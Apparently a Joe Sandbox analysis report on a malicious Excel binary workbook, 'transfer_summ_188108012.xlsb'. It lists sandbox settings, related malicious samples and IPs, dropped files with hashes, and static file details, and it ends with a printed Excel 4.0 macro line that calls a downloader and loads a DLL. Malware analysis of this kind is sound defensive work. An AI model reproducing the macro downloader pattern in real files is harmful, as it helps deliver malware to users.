                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal64.expl.evad.winXLSB@3/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 168.61.161.212, 52.109.76.68, 52.109.12.23, 52.109.12.24, 93.184.220.29, 20.82.209.183, 204.79.197.200, 13.107.21.200, 20.54.7.98, 20.54.26.129, 20.54.104.15, 93.184.221.240, 20.50.102.62, 92.122.213.194, 92.122.213.247
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    185.180.199.125pmnt_spec_031624191.xlsbGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      HOSTING-SOLUTIONSUSpmnt_spec_031624191.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.199.125
                                                                                                                                                      PO187439.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.162.128.35
                                                                                                                                                      Order_Summary-9632850.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.199.121
                                                                                                                                                      Total_order_data-V2434883.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.199.121
                                                                                                                                                      Delivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.199.121
                                                                                                                                                      W6DkFm55kO.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.248.225.14
                                                                                                                                                      Lma2EzVvAK.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.250
                                                                                                                                                      wEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                      • 104.193.252.114
                                                                                                                                                      immed_paym_req_44191988.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.159.82.194
                                                                                                                                                      zKOi8vCorq.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.99
                                                                                                                                                      invoice_100221.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.135
                                                                                                                                                      new shippment.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.135
                                                                                                                                                      w3QgrgNAWs.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.99
                                                                                                                                                      yWWZnMPf9D.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.99
                                                                                                                                                      zLjBdL6Lbk.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.180.198.141
                                                                                                                                                      DHL_file094883764773845.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.244.32.175
                                                                                                                                                      https://bit.ly/3547mtOGet hashmaliciousBrowse
                                                                                                                                                      • 162.244.32.223
                                                                                                                                                      http://436095.com/cwuobmjj/lnclqsrq.html?5crjx3rlwse.eps2kGet hashmaliciousBrowse
                                                                                                                                                      • 162.244.32.223
                                                                                                                                                      https://bit.ly/2H1vYuPGet hashmaliciousBrowse
                                                                                                                                                      • 162.244.32.223
                                                                                                                                                      https://bit.ly/33rThahGet hashmaliciousBrowse
                                                                                                                                                      • 162.244.32.223

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\169CBBD9-A660-4E29-98C8-43AC6B26ED38
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):134922
                                                                                                                                                      Entropy (8bit):5.369099616380359
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:5cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:lEQ9DQW+ziXOe
                                                                                                                                                      MD5:6FBCC10A912548F46EA8F1F31FDC9246
                                                                                                                                                      SHA1:09BE2ADC4C58CD7CC82E6E634B78FBC0E8F25422
                                                                                                                                                      SHA-256:71BCE31715BD4766156E7029E2277237F599BC75BF481AE149A6320D7357D772
                                                                                                                                                      SHA-512:2D82788DF7709AC6D75DC21469435A3494A5DF06B4FCCA15B3EFA86D536B64E36E701F8CE53E01E3E779241596B68B1772BEE519317D1A066414CA933CC9396B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T10:16:07">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\11F179D3.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9924
                                                                                                                                                      Entropy (8bit):7.973758306371751
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                      MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                      SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                      SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                      SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3B72A659.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):956
                                                                                                                                                      Entropy (8bit):7.683552542542939
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
                                                                                                                                                      MD5:32C83607A5C98C5A634278E5AED3AD61
                                                                                                                                                      SHA1:EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
                                                                                                                                                      SHA-256:4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
                                                                                                                                                      SHA-512:AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\425633BD.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):23989
                                                                                                                                                      Entropy (8bit):7.989754044300238
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                      MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                      SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                      SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                      SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\56841B8.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5744
                                                                                                                                                      Entropy (8bit):7.966496386988271
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                      MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                      SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                      SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                      SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C472EE9A.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6177
                                                                                                                                                      Entropy (8bit):7.959095006853368
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                      MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                      SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                      SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                      SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\95C40000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):79256
                                                                                                                                                      Entropy (8bit):7.8964489993388405
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGH+:9+wol7eO6RSYP2sTU2yF70cAijW2+
                                                                                                                                                      MD5:9C99DB073DF24659166A16FCC7880B8A
                                                                                                                                                      SHA1:11786CBF732FF35B91E1D43E3085FD6538986E80
                                                                                                                                                      SHA-256:B796DA44A4EBEB360F9FBC112775F4F292D09E8BAF4593C787594C207F8FE6D7
                                                                                                                                                      SHA-512:C03E25E596AD197C259B98D2DFA854F12518DA2BF67414689E0451F5CC0E7F4F128E47DB83385DC59F06256F73FDF597C8CCDB0EC3B1688050FA4A07C2AED235
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .T.n.0....?..........C.c. ....X"...&..>CZq.8V...[.Q3....."j.Z6m&..'..k......U..S.x.-........n..+B;lY.R..9......p....D...A....L~s.]...9.|v.+qoRu....:V]..R-.6..:?.Xj..!B0Z.D.......j.%(/.-.i0D..{.dM..&...R.(......&:......^..Ia}..w.......0j...........z...9N...X.F.iJ...2.+'..hOh....RA"/..'$..$.O#WR.G|...:?.i3..3.eD.....\O....b...o.wG:....6Q[t.n.5.....c.....s.......> ..._O...3..D.1i.w....+R..|...u@..1>........PK..........!................[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22
                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                      C:\Users\user\Desktop\~$transfer_summ_188108012.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.875825877556854
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                      • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                      File name:transfer_summ_188108012.xlsb
                                                                                                                                                      File size:63444
                                                                                                                                                      MD5:1b248ad3215a78ee6b006f3aa6bc68d7
                                                                                                                                                      SHA1:68d5e1de3e7a2f2a8ef3068e6ca84675388263fd
                                                                                                                                                      SHA256:5b01a95d0fd0be91d68e35bc0d9c273eefadd24453c80a1a3a2ed3436f13220e
                                                                                                                                                      SHA512:dcf17dc636641e16c31f99769674329ebb7212ba793199cf7489c1327628f340b3b403cedaf67895a9af803d30b276b38fcdc0d143b3f4c9c3002d1324ad6284
                                                                                                                                                      SSDEEP:1536:eMTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:eMTi5j2sTU2yF70liWW20Ra
                                                                                                                                                      File Content Preview:PK..........!..<......z.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "transfer_summ_188108012.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
                                                                                                                                                      
